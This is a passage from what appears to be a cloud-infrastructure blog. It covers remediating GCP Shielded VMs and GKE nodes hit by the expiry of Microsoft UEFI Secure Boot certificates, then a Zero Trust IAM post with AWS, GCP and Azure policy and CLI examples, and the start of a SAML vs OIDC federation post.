3. Next reboot: the node fails to boot
4. The node is marked NotReady, workloads are rescheduled — but the underlying VM is stuck

Detecting Affected Resources

Compute Engine Instances

gcloud compute instances list \
  --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,shieldedInstanceConfig.enableSecureBoot,status)"

Sample output:

NAME               ZONE           CREATION_TIMESTAMP        ENABLE_SECURE_BOOT  STATUS
prod-api-01        us-central1-a  2024-08-15T10:22:00Z      True                RUNNING   ← at risk
prod-db-02         us-central1-b  2023-11-01T08:15:00Z      True                RUNNING   ← at risk
prod-web-03        us-central1-a  2025-12-01T14:30:00Z      True                RUNNING   ← safe (post-Nov 7)

GKE Node Pools

# List node pools with Secure Boot enabled per cluster
gcloud container clusters list --format="value(name,location)" | while read NAME LOCATION; do
  echo "=== Cluster: $NAME ($LOCATION) ==="
  gcloud container node-pools list \
    --cluster="$NAME" \
    --location="$LOCATION" \
    --filter="config.shieldedInstanceConfig.enableSecureBoot=true" \
    --format="table(name,config.shieldedInstanceConfig.enableSecureBoot,management.autoUpgrade)"
done

Then verify node creation timestamps within affected pools:

gcloud compute instances list \
  --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true" \
  --format="table(name,zone,creationTimestamp,labels.goog-gke-node)"

Checking the UEFI DB on a Running Instance

SSH into an affected instance and verify which certs are in the DB:

# On the instance (requires mokutil and/or efitools)
sudo mokutil --db | grep -A3 "Subject:"

Look for CN=Microsoft UEFI CA 2023 in the output. Its absence means your instance has only the 2011 certs.

On GKE nodes (where you have node shell access via a DaemonSet or node debug pod):

# Using kubectl debug for node access
kubectl debug node/NODE_NAME -it --image=ubuntu -- bash
# Then inside the debug pod:
chroot /host
mokutil --db 2>/dev/null | grep "Microsoft.*2023" || echo "2023 cert NOT present — node at risk"

Solutions

Option 1: Recreate Instances (Primary — Recommended by Google)

Instances created after November 7, 2025 automatically receive the updated UEFI certificate database. The simplest fix is to recreate affected instances.

For Compute Engine:

# Step 1: Create a machine image (snapshot) of the existing instance
gcloud compute machine-images create INSTANCE_NAME-backup \
  --source-instance=INSTANCE_NAME \
  --source-instance-zone=ZONE

# Step 2: Delete the old instance (after verifying backup)
gcloud compute instances delete INSTANCE_NAME --zone=ZONE

# Step 3: Create new instance from machine image
gcloud compute instances create INSTANCE_NAME \
  --source-machine-image=INSTANCE_NAME-backup \
  --zone=ZONE \
  --shielded-secure-boot \
  --shielded-vtpm \
  --shielded-integrity-monitoring

The new instance will have the post-November 7, 2025 UEFI DB.

For GKE Node Pools:

# Option A: Upgrade the node pool (triggers node recreation)
gcloud container clusters upgrade CLUSTER_NAME \
  --location=LOCATION \
  --node-pool=NODE_POOL_NAME

# Option B: Recreate the node pool entirely
gcloud container node-pools create NODE_POOL_NAME-new \
  --cluster=CLUSTER_NAME \
  --location=LOCATION \
  --shielded-secure-boot \
  --shielded-integrity-monitoring \
  [... your existing pool config ...]

# Then cordon and drain the old pool nodes
kubectl cordon NODE_NAME
kubectl drain NODE_NAME --ignore-daemonsets --delete-emptydir-data

# Finally delete the old node pool
gcloud container node-pools delete NODE_POOL_NAME \
  --cluster=CLUSTER_NAME \
  --location=LOCATION

Option 2: Disable Secure Boot Temporarily (Emergency Workaround)

If an instance has already failed to boot after an OS update, or if you need to apply bootloader updates before recreating the instance:

# Disable Secure Boot on the stopped instance
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --no-shielded-secure-boot

# Start the instance
gcloud compute instances start INSTANCE_NAME --zone=ZONE

# SSH in, apply OS updates and any pending bootloader upgrades
# (The system will boot without Secure Boot enforcement)
sudo apt-get update && sudo apt-get upgrade -y   # Debian/Ubuntu
# or
sudo dnf update -y                                # RHEL/CentOS

# Stop the instance again
gcloud compute instances stop INSTANCE_NAME --zone=ZONE

# Re-enable Secure Boot
gcloud compute instances update INSTANCE_NAME \
  --zone=ZONE \
  --shielded-secure-boot

# Start again — now boots with new bootloader binaries
gcloud compute instances start INSTANCE_NAME --zone=ZONE

Note: This workaround doesn’t add the 2023 certs to the DB. It bypasses Secure Boot enforcement temporarily. The underlying UEFI DB still only has the 2011 certs. You still need to recreate the instance to get the updated DB — this is only a bridge to keep the instance alive while you plan migration.

Option 3: Restore from Machine Image

If an instance is already in a boot failure state and the workaround above doesn’t apply:

# List available machine images
gcloud compute machine-images list

# Restore from a pre-failure machine image
gcloud compute instances create INSTANCE_NAME-restored \
  --source-machine-image=MACHINE_IMAGE_NAME \
  --zone=ZONE

Then immediately plan recreation on a post-November 7, 2025 instance.

vTPM, BitLocker, and Full Disk Encryption: The Hidden Risk

For VMs using Shielded VM features beyond just Secure Boot — specifically vTPM with sealed secrets — certificate expiry creates a more dangerous failure mode.

How vTPM sealing works:

  Boot sequence measurements → PCR registers (PCR 0–7 for UEFI, PCR 8–15 for OS)
         │
         ▼
  TPM seals secrets (FDE key, BitLocker key) to specific PCR values
         │
         ▼
  On next boot: PCR values must match for TPM to release the key
         │
         ▼
  If Secure Boot state changes (cert DB changes, Secure Boot disabled) →
  PCR values change → TPM refuses to unseal → FDE fails → disk inaccessible

What this means in practice:

Linux FDE (LUKS with TPM2 unsealing): If Secure Boot fails or is temporarily disabled per the workaround above, the TPM will not release the LUKS volume key. The system will drop to a recovery prompt. You need the LUKS recovery passphrase.
Windows BitLocker: If PCR values shift (Secure Boot disabled, cert DB changed), BitLocker enters recovery mode. The VM prompts for the BitLocker recovery key on next boot. Without it, the volume is inaccessible.
Windows Virtual Secure Mode: VSM uses vTPM to protect credentials. If Secure Boot state changes, VSM-protected secrets become inaccessible until re-enrollment.

Action before any changes:

# For Linux: ensure you have the LUKS recovery key
sudo cryptsetup luksDump /dev/sda3 | grep "Key Slot"

# For Windows: export BitLocker recovery key before touching Secure Boot state
# (Do this from within the running Windows instance via PowerShell)
Get-BitLockerVolume | Select-Object -ExpandProperty KeyProtector | Where-Object {$_.KeyProtectorType -eq "RecoveryPassword"}

Store recovery keys in Secret Manager, not just locally:

# Store LUKS key in GCP Secret Manager
echo -n "YOUR_RECOVERY_KEY" | gcloud secrets create luks-recovery-INSTANCE_NAME \
  --data-file=- \
  --replication-policy=automatic

⚠ Production Gotchas

1. OS update automation is the trigger, not the cert expiry date itself.
The certs don’t enforce anything at runtime. The actual failure happens when an unattended-upgrade, yum-cron, or GKE node OS update pulls in a new shim/Boot Manager binary signed only by the 2023 cert. Instances may fail to boot weeks or months before the official cert expiry date if distros ship updated bootloaders early.

2. GKE surge upgrades can mask the problem — temporarily.
During a node pool upgrade, GKE creates new nodes (with updated certs) before draining old ones. Workloads move to new nodes. The old nodes get deleted. This looks fine — until you realize some in-place operations (node taints, label changes, manual kubelet restarts) could force old nodes to reboot without triggering node replacement.

3. Disabling Secure Boot changes vTPM PCR values — plan FDE recovery before touching anything.
The temporary workaround (disable Secure Boot) will invalidate TPM-bound disk encryption. Have recovery keys ready before running --no-shielded-secure-boot.

4. Windows Event ID 1801 is an early warning — act on it.
If you see this event in your Windows Compute Engine instances before June 2026, that instance has already identified itself as carrying the old certs. Use it as your automated detection signal in Cloud Logging.

# Query Cloud Logging for Event ID 1801 across Windows instances
gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801' \
  --format="table(resource.labels.instance_id,timestamp,jsonPayload.Message)" \
  --limit=50

5. Instance templates propagate the old DB.
If you use instance templates or managed instance groups (MIGs) to create VMs, and those templates were created before November 7, 2025, new instances created from them may or may not inherit updated certs depending on how the template configures the UEFI DB. Verify by checking creation timestamp of the resulting instance, not the template.

6. Custom OS images don’t fix this.
Importing a custom image or using a custom OS does not update the UEFI certificate database. The DB is part of the VM’s UEFI firmware state, not the OS disk image. Recreating the instance is the only reliable path.

Quick Reference: Commands

Task	Command
List affected Compute Engine VMs	`gcloud compute instances list --filter="creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true"`
Check UEFI DB on a Linux VM	`sudo mokutil --db \\| grep -E "Subject\\|Not After"`
Check for 2023 cert presence	`mokutil --db 2>/dev/null \\| grep "Microsoft.*2023" \\|\\| echo "2023 cert absent"`
Disable Secure Boot (emergency)	`gcloud compute instances update INSTANCE --zone=ZONE --no-shielded-secure-boot`
Re-enable Secure Boot	`gcloud compute instances update INSTANCE --zone=ZONE --shielded-secure-boot`
Find affected GKE nodes	`gcloud compute instances list --filter="labels.goog-gke-node:* AND creationTimestamp < '2025-11-07' AND shieldedInstanceConfig.enableSecureBoot=true"`
Trigger GKE node pool upgrade	`gcloud container clusters upgrade CLUSTER --location=LOCATION --node-pool=POOL`
Store LUKS key in Secret Manager	`echo -n "KEY" \\| gcloud secrets create NAME --data-file=-`
Query Windows Event 1801 in Logging	`gcloud logging read 'resource.type="gce_instance" AND jsonPayload.EventID=1801'`
Create machine image backup	`gcloud compute machine-images create BACKUP --source-instance=INSTANCE --source-instance-zone=ZONE`

Framework Alignment

Framework	Domain	Relevance
CISSP	Domain 7: Security Operations	Patch management, boot integrity, incident response
CISSP	Domain 3: Security Architecture	Secure Boot trust chain, TPM integration, cryptographic key lifecycle
NIST CSF 2.0	ID.AM, PR.IP	Asset inventory of affected VMs; integrity protection of boot chain
CIS Benchmarks	CIS Google Cloud Computing Foundations	Shielded VM controls, vTPM configuration
OWASP Top 10	A05: Security Misconfiguration	Failure to maintain certificate currency in security-critical infrastructure

Key Takeaways

The expiry of three Microsoft UEFI CA certificates in 2026 creates a window where GCP VMs with Secure Boot enabled — created before November 7, 2025 — will fail to boot after pulling in new bootloader packages
The failure is not instantaneous on the cert expiry date. It’s triggered by the next OS update that ships a bootloader signed exclusively by the 2023 replacement certs
GKE Shielded Nodes are affected through the same mechanism: node VMs that haven’t been recreated since November 7, 2025 carry the old UEFI database
vTPM-sealed secrets (FDE, BitLocker, VSM) add a secondary failure mode if Secure Boot state is changed as part of remediation — have recovery keys before touching anything
Google’s recommended fix is instance recreation. The workaround (disable Secure Boot temporarily) keeps instances alive but doesn’t fix the underlying DB — treat it as a bridge, not a resolution
Audit now, before June 24. The command is one line. The blast radius of missing this is a production boot failure at 2 AM after a routine security patch run

What’s Next

If you’re running Shielded VMs in production, this certificate expiry is the kind of quiet deadline that fails silently — not with an alarm, but with a VM that doesn’t come back after a patch cycle. The time to audit is before your automated patching runs, not after.

If you found this useful, the linuxcent.com newsletter covers infrastructure security at this depth regularly — kernel internals, cloud platform gotchas, and the operational implications that vendor docs bury in footnotes.

Get the next deep-dive in your inbox when it publishes → [subscribe link]

Zero Trust Access in the Cloud: How the Evaluation Loop Actually Works

July 6, 2026April 20, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes → OIDC Workload Identity → AWS IAM Privilege Escalation → AWS Least Privilege Audit → SAML vs OIDC Federation → Kubernetes RBAC and AWS IAM → Zero Trust Access in the Cloud

TL;DR

Zero Trust: trust nothing implicitly, verify everything explicitly, minimize blast radius by assuming you will be breached
Network location is not identity — VPN is authentication for the tunnel, not authorization for the resource
JIT privilege elevation removes standing admin access: engineers request elevation for a specific purpose, scoped to a specific duration
Device posture is an access signal — a compromised endpoint with valid credentials is still a threat; Conditional Access gates on device compliance
Continuous session validation re-evaluates signals throughout the session — device falls out of compliance, sessions revoke in minutes, not at expiry
The highest-ROI early moves: eliminate machine static credentials, enforce MFA on all human access, federate to a single IdP

The Big Picture

  ZERO TRUST IAM — EVERY REQUEST EVALUATED INDEPENDENTLY

  API call arrives
         │
         ▼
  Identity verified? ──── No ────► DENY
         │
        Yes
         │
         ▼
  Device compliant? ───── No ────► DENY (or step-up MFA)
         │
        Yes
         │
         ▼
  Policy allows this  ─── No ────► DENY
  action on this ARN?
         │
        Yes
         │
         ▼
  Conditions met? ─────── No ────► DENY
  (time, IP, MFA age,              (e.g., outside business hours,
   risk score, session)             impossible travel detected)
         │
        Yes
         │
         ▼
       ALLOW ──────────────────────► LOG every decision (allow and deny)
         │
         └── Continuous re-evaluation:
             device state changes → revoke
             anomaly detected → revoke or step-up
             credential age → require re-auth

Introduction

The perimeter model of network security made a bet: inside the network is trusted, outside is not. Lock down the perimeter tightly enough and you’re safe. VPN in, and you’re one of us.

I grew up professionally in that model. Firewalls, DMZs, trusted zones. The idea had intuitive appeal — you build walls, you control what crosses them. For a while it worked reasonably well.

Then I watched it fail, repeatedly, in ways that were predictable in hindsight. An engineer’s laptop gets compromised at a coffee shop. They VPN in. Now the attacker is “inside.” A contractor account gets phished. They have valid Active Directory credentials. They’re inside. A cloud service gets misconfigured and exposes a management interface. There’s no perimeter for that to be inside of.

The perimeter model failed not because the walls weren’t strong enough, but because the premise was wrong. There is no inside. There is no perimeter that reliably separates trusted from untrusted. In a world of remote work, cloud services, contractor access, and API integrations, the attack surface doesn’t respect network boundaries.

Zero Trust is the architecture built on a different premise: trust nothing implicitly. Verify everything explicitly. Minimize blast radius by assuming you will be breached.

This isn’t a product you buy. It’s a set of principles applied to how you design, build, and operate your IAM. This episode is how those principles translate to concrete practices — building on everything we’ve covered in this series.

The Three Principles

Verify Explicitly

Every request must carry verifiable identity and context. Network location is not identity.

Old model: request from 10.0.0.0/8 → trusted, proceed
Zero Trust: request from 10.0.0.0/8 → still must present verifiable identity
                                       still must pass authorization check
                                       still must pass context evaluation
                                       then proceed (or deny)

In cloud IAM terms: every API call carries identity claims (IAM role ARN, federated identity, managed identity), and those claims are verified against policy on every single request. There’s no concept of “once authenticated, trusted until logout.” In cloud IAM, this already exists natively. Every API call is authenticated and authorized independently. The challenge is extending this model to internal services, internal APIs, and human access patterns.

Implementation in practice:
– mTLS for service-to-service communication — both sides present certificates; identity is the certificate, not the network path
– Bearer tokens on every internal API call — no session cookies, no “we’re on the same VPC so it’s fine”
– Short-lived credentials everywhere — a compromised credential expires, not “after the session times out in 8 hours”

Use Least Privilege — Just-in-Time, Just-Enough

No standing access to sensitive resources. Access granted when needed, for the minimum scope, for the minimum duration.

Old model: alice is in the DBA group → permanent access to all databases
Zero Trust: alice requests access to production DB →
            verified: alice's device is enrolled in MDM and compliant
            verified: alice has an open change ticket for this task
            verified: current time is within business hours
            granted: connection to this specific database, from alice's specific IP
                     for 2 hours, then revoked automatically

This is JIT access. It reduces the window where a compromised credential can cause damage. It requires a change in how engineers think about access: access is not a property you have, it’s something you request when you need it. The operational friction is a feature, not a bug. Justifying each elevated access request is what keeps the access model honest.

Assume Breach

Design systems as if the attacker is already inside. This drives different decisions:

Micro-segmentation: one role per service, minimum permissions per role. If one service is compromised, it can’t pivot to everything else.
Log everything: every authorization decision, allow or deny. When you’re investigating an incident, you need to know what happened, not just that something happened.
Automate response: anomalous API call pattern → trigger automated credential revocation or session termination. Don’t wait for a human to notice.

Building Zero Trust IAM — Block by Block

Block 1: Strong Identity Foundation

You can’t verify explicitly without strong authentication. The starting point:

# AWS: require MFA for all IAM operations — enforce via SCP across the org
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "BoolIfExists": {
      "aws:MultiFactorAuthPresent": "false"
    },
    "StringNotLike": {
      "aws:PrincipalArn": [
        "arn:aws:iam::*:role/AWSServiceRole*",
        "arn:aws:iam::*:role/OrganizationAccountAccessRole"
      ]
    }
  }
}

# GCP: enforce OS Login for VM SSH (ties SSH access to Google identity, not SSH keys)
gcloud compute project-info add-metadata \
  --metadata enable-oslogin=TRUE

# This means: SSH to a VM requires your Google identity to have roles/compute.osLogin
# or roles/compute.osAdminLogin. No more managing ~/.authorized_keys files on instances.

For human access: hardware FIDO2 keys (YubiKey, Google Titan) rather than TOTP where possible. TOTP codes can be phished in real-time adversary-in-the-middle attacks. Hardware keys cannot — the cryptographic challenge-response is bound to the origin URL.

Block 2: Device Posture as an Access Signal

In a Zero Trust model, the identity of the user is necessary but not sufficient. The state of the device matters too — a compromised endpoint with valid credentials is still a threat.

# Azure Conditional Access: block access from non-compliant devices
# (configures in Entra ID Conditional Access portal)
conditions:
  clientAppTypes: [browser, mobileAppsAndDesktopClients]
  devices:
    deviceFilter:
      mode: exclude
      rule: "device.isCompliant -eq True and device.trustType -eq 'AzureAD'"
grantControls:
  builtInControls: [compliantDevice]

# AWS Verified Access: identity + device posture for application access — no VPN
aws ec2 create-verified-access-instance \
  --description "Zero Trust app access"

# Attach identity trust provider (Okta OIDC)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type user \
  --user-trust-provider-type oidc \
  --oidc-options IssuerURL=https://company.okta.com,ClientId=...,ClientSecret=...,Scope=openid

# Attach device trust provider (Jamf, Intune, or CrowdStrike)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type device \
  --device-trust-provider-type jamf \
  --device-options TenantId=JAMF_TENANT_ID

AWS Verified Access allows users to reach internal applications by verifying both their identity (via OIDC) and their device health (via MDM) — without a VPN. The access gateway evaluates both signals on every connection, not just at login.

Block 3: Just-in-Time Privilege Elevation

No standing elevated access. Engineers are eligible for elevated roles; they activate them when needed.

# Azure PIM: engineer activates an eligible privileged role
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant — incident ticket INC-2026-0411",
    "scheduleInfo": {
      "startDateTime": "2026-04-11T09:00:00Z",
      "expiration": {"type": "AfterDuration", "duration": "PT4H"}
    }
  }'
# Access activates, lasts 4 hours, then automatically removed

# AWS: temporary account assignment via Identity Center
# (typically triggered by ITSM workflow integration, not manual CLI)
aws sso-admin create-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

# Schedule deletion (using EventBridge + Lambda in a real deployment)
aws sso-admin delete-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

The operational change this requires: engineers stop thinking of access as something they hold permanently and start thinking of it as something they request for a specific purpose.

This feels like friction until you’re investigating an incident and you have a precise record of who activated what elevated access and why.

Block 4: Continuous Session Validation

Traditional auth: verify once at login, trust the session until timeout.
Zero Trust auth: re-evaluate access signals continuously throughout the session.

Session starts: identity verified + device compliant + IP in expected range
                → access granted

15 minutes later: impossible travel detected (IP changes to different country)
                  → step-up authentication required, or session terminated

Later: device compliance state changes (EDR detects malware)
       → all active sessions for this device revoked immediately

This requires integration between your identity platform and your device management / EDR tooling. Entra ID Conditional Access with Continuous Access Evaluation (CAE) implements this natively. When certain events occur — device compliance change, IP anomaly, token revocation — access tokens are invalidated within minutes rather than waiting for natural expiry.

// GCP: bind IAM access to an Access Context Manager access level
// Access level enforces device compliance — if device falls out of compliance,
// the access level is no longer satisfied and requests fail immediately
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.auth.access_levels.exists(x, x == 'accessPolicies/POLICY_NUM/accessLevels/corporate_compliant_device'),title=Compliant device required"

Block 5: Micro-Segmented Permissions

Every service has its own identity. Every identity has only what it needs. Compromise of one service cannot propagate to others.

# Terraform: IAM as code — each service gets a dedicated, scoped role
resource "aws_iam_role" "order_processor" {
  name                 = "svc-order-processor"
  permissions_boundary = aws_iam_policy.service_boundary.arn

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "order_processor" {
  name   = "order-processor-policy"
  role   = aws_iam_role.order_processor.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["sqs:ReceiveMessage", "sqs:DeleteMessage", "sqs:GetQueueAttributes"]
        Resource = aws_sqs_queue.orders.arn
      },
      {
        Effect   = "Allow"
        Action   = ["dynamodb:PutItem", "dynamodb:GetItem", "dynamodb:UpdateItem"]
        Resource = aws_dynamodb_table.orders.arn
      }
    ]
  })
}

# Open Policy Agent: enforce IAM standards at the policy level
# Run this in CI/CD — fail the build if any policy statement has wildcard actions
package iam.policy

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Action == "*"
  msg := sprintf("Statement %d has wildcard Action — not allowed", [i])
}

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Resource == "*"
  endswith(input.Statement[i].Action, "Delete")
  msg := sprintf("Statement %d allows Delete on all resources — requires specific ARN", [i])
}

Block 6: Universal Audit Trail

Zero Trust without logging is just obscurity. Every authorization decision — allow and deny — must be logged, retained, and queryable.

# AWS: verify CloudTrail is comprehensive
aws cloudtrail get-trail-status --name management-trail
# Must have: LoggingEnabled=true, IsMultiRegionTrail=true, IncludeGlobalServiceEvents=true

# Verify no management events are excluded
aws cloudtrail get-event-selectors --trail-name management-trail \
  | jq '.EventSelectors[] | {ReadWrite: .ReadWriteType, Mgmt: .IncludeManagementEvents}'
# ReadWriteType should be "All"; IncludeManagementEvents should be true

# GCP: ensure Data Access audit logs are enabled for IAM
gcloud projects get-iam-policy my-project --format=json | jq '.auditConfigs'
# Should see auditLogConfigs for cloudresourcemanager.googleapis.com and iam.googleapis.com
# with both DATA_READ and DATA_WRITE enabled

# Azure: route Entra ID logs to Log Analytics for long-term retention and querying
az monitor diagnostic-settings create \
  --name entra-audit-to-la \
  --resource "/tenants/TENANT_ID/providers/microsoft.aad/domains/company.com" \
  --logs '[{"category":"AuditLogs","enabled":true},{"category":"SignInLogs","enabled":true}]' \
  --workspace /subscriptions/SUB_ID/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/security-logs

Framework Alignment

Zero Trust IAM isn’t a framework itself — it’s a design philosophy. But it maps cleanly onto the controls that compliance frameworks are pushing organizations toward:

Framework	Reference	What It Covers Here
CISSP	Domain 5 — IAM	Zero Trust reframes IAM as continuous, context-aware verification rather than perimeter-based trust
CISSP	Domain 1 — Security & Risk Management	Assume breach as a risk management posture; blast radius minimization through least privilege
CISSP	Domain 7 — Security Operations	Continuous monitoring, anomaly detection, and automated response are operational requirements of Zero Trust
ISO 27001:2022	5.15 Access control	Zero Trust access policy: verify explicitly, least privilege, assume breach
ISO 27001:2022	8.16 Monitoring activities	Continuous session validation and universal audit trail — all authorization decisions logged
ISO 27001:2022	8.20 Networks security	Micro-segmentation and mTLS replace implicit network trust with verified identity at every hop
ISO 27001:2022	5.23 Information security for cloud services	Zero Trust architecture applied to cloud IAM across AWS, GCP, and Azure
SOC 2	CC6.1	Zero Trust logical access controls — JIT, device posture, context-aware authorization
SOC 2	CC6.7	Continuous session validation and transmission controls across all system components
SOC 2	CC7.1	Threat detection through universal audit trails and anomaly-triggered automated response
SOC 2	CC7.2	Incident response — automated revocation and session termination on anomaly detection

Zero Trust Maturity — Where to Start

In practice, most organizations think about Zero Trust as a destination — a large, multi-year program. The reality is it’s a direction. Any movement in that direction reduces risk.

Level	Where You Are	What to Build Next
1 — Initial	Some MFA; static credentials for machines; no centralized IdP	Eliminate machine static keys → workload identity
2 — Managed	Centralized IdP; SSO for most systems; some MFA enforcement	Close SSO gaps; enforce MFA everywhere; federate to cloud
3 — Defined	Least privilege being enforced; audit tooling in use; JIT for some privileged access	Expand JIT; policy-as-code in CI/CD; quarterly access reviews
4 — Contextual	Device posture in access decisions; conditional access policies	Continuous session evaluation; automated anomaly response
5 — Optimizing	Policy-as-code everywhere; automated right-sizing; anomaly-triggered revocation	Refine and maintain — Zero Trust is never “done”

The jump from Level 1 to Level 3 delivers the most security value per unit of effort. Start there. Don’t defer least privilege enforcement while you build a sophisticated device posture integration.

The Practical Sequence

If you’re building Zero Trust IAM from where most organizations are, this is the order that maximizes early security value:

Inventory all identities — human and machine. You cannot secure what you can’t see. Build a complete picture before changing anything.
Eliminate static credentials for machines — replace access keys and SA key files with workload identity. This is the highest-ROI change in most environments.
Enforce MFA for all human access — especially cloud consoles, IdP admin, and VPN. Hardware keys for privileged accounts.
Federate human identity — single IdP, SSO to cloud and major applications. Centralize the revocation path.
Right-size IAM permissions — use last-accessed data and IAM Recommender to find and remove unused permissions. This is a continuous discipline, not a one-time clean-up.
JIT for privileged access — Azure PIM, AWS Identity Center assignment automation, or equivalent for all elevated roles. No standing admin.
IAM as code — all IAM changes via Terraform/Pulumi/CDK, reviewed in pull requests, validated by Access Analyzer or OPA in CI/CD, applied through automation.
Continuous monitoring — alerts on IAM mutations, anomalous API call patterns, new cross-account trust relationships, new public resource exposures.
Add context signals — Conditional Access policies incorporating device posture. Access Context Manager in GCP. AWS Verified Access for application access.
Automated response — anomaly detected → automatic credential suspension or session termination. Close the window between detection and containment.

Core Curriculum Complete

These twelve episodes covered Cloud IAM from the question “what even is IAM?” to Zero Trust architecture:

Episode	Topic	The Core Lesson
EP01	What is IAM?	Access management is deny-by-default; every grant is an explicit decision
EP02	AuthN vs AuthZ	Two separate gates; passing one doesn’t open the other
EP03	Roles, Policies, Permissions	Structure prevents drift; wildcards accumulate into exposure
EP04	AWS IAM Deep Dive	Trust policies and permission policies are both required; the evaluation chain has six layers
EP05	GCP IAM Deep Dive	Hierarchy inheritance is a feature that needs careful handling; service account keys are an antipattern
EP06	Azure RBAC and Entra ID	Two separate authorization planes; managed identities are the right model for workloads
EP07	Workload Identity	Static credentials for machines are solvable at the root; OIDC token exchange replaces them
EP08	IAM Attack Paths	The attack chain runs through IAM; `iam:PassRole` and its equivalents are privilege escalation primitives
EP09	Least Privilege Auditing	5% utilization is the average; the 95% excess is attack surface — and it’s measurable
EP10	Federation, OIDC, SAML	The IdP is the trust anchor; everything downstream is bounded by its security
EP11	Kubernetes RBAC	Two separate IAM layers; both must be secured; `cluster-admin` is the first thing to audit
EP12	Zero Trust IAM	Trust nothing implicitly; verify everything explicitly; minimize blast radius through least privilege at every layer

IAM is not a feature you configure. It’s a practice you maintain. The organizations that operate with genuinely low cloud IAM risk don’t have fewer identities — they have better visibility into what those identities can do, and why, and what happened when something went wrong.

That’s the foundation this series has been building toward — but the curriculum doesn’t stop here. AWS, GCP, and Azure ship new services constantly, and every new service ships new IAM permissions. Scoping a policy correctly on day one is a different skill than auditing it after the fact — that’s where this series goes next.

The full series is at linuxcent.com/cloud-iam-series. Subscribe to get new Cloud IAM episodes as new cloud permissions land — plus the eBPF series running in parallel, covering what’s actually running in kernel space when Cilium, Falco, and Tetragon do their work.

Subscribe → linuxcent.com/subscribe

SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?

May 10, 2026April 20, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

TL;DR

Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t manage them independently
SAML is XML-based, browser-oriented, the enterprise standard; OIDC is JWT-based, API-native, the modern protocol for workload identity and consumer SSO
In OIDC trust policies, the sub condition is the security boundary — omitting it means any GitHub Actions workflow in any repository can assume your role
Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but need correct configuration (especially aud)
The IdP is the trust anchor: compromise the IdP and every downstream system is compromised. Treat IdP admin access with the same controls as your most sensitive system.
JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

The Big Picture

  FEDERATION: HOW TRUST FLOWS FROM IdP TO DOWNSTREAM SYSTEMS

  Identity Provider  (Okta / Entra ID / Google / AD FS)
  ┌──────────────────────────────────────────────────────────────────┐
  │  User or workload authenticates → IdP issues signed assertion   │
  │                                                                  │
  │  ┌──────────────────────────┐  ┌───────────────────────────┐   │
  │  │  SAML Assertion (XML)    │  │  OIDC ID Token (JWT)       │   │
  │  │  RSA-signed, 5–10 min    │  │  RS256-signed, ~1 hr      │   │
  │  │  Audience: SP entity ID  │  │  aud: client ID           │   │
  │  │  Subject: user identity  │  │  sub: specific workload   │   │
  │  └───────────┬──────────────┘  └──────────┬────────────────┘   │
  └─────────────────────────────────────────────────────────────────┘
                 │  human SSO                  │  workload identity
                 ▼                             ▼
  ┌─────────────────────────┐  ┌───────────────────────────────────┐
  │ SP validates signature  │  │ AWS STS / GCP STS validates       │
  │ + audience + timestamp  │  │ signature + iss + aud + sub       │
  │ → console session       │  │ → AssumeRoleWithWebIdentity       │
  └─────────────────────────┘  └───────────────────────────────────┘

  Security bound: IdP security bounds every system that trusts it
  Disable in Okta → access revoked everywhere that trusts Okta

Introduction

Before federation existed, every system had its own user database. Your Jira account. Your AWS account. Your Salesforce account. Your internal wiki. Each one had its own password, its own MFA, its own offboarding process. When an engineer joined, someone had to create accounts in every system. When they left, you hoped whoever processed the offboarding remembered to deactivate all of them.

I’ve done that audit — the one where you’re trying to figure out if a former employee still has access to anything. You go system by system, cross-reference against HR records, find accounts that exist in places you’ve forgotten the company even uses. In one environment I found an ex-engineer’s account still active in a vendor portal six months after they left, because that system was set up by someone who had since also left the company, and nobody had documented it.

Federation solves this structurally. One identity provider. One place to authenticate. One place to revoke. Every downstream system trusts the IdP’s assertion rather than managing credentials independently. Disable someone in Okta and they lose access everywhere that trusts Okta — immediately, without a checklist.

This episode is how federation actually works at the protocol level, because understanding the mechanism is what lets you design it securely. A federation setup with a trust policy that accepts assertions from any OIDC issuer is worse than no federation — it’s a false sense of security.

The Federation Model

Identity Provider (IdP)          Service Provider (SP) / Relying Party
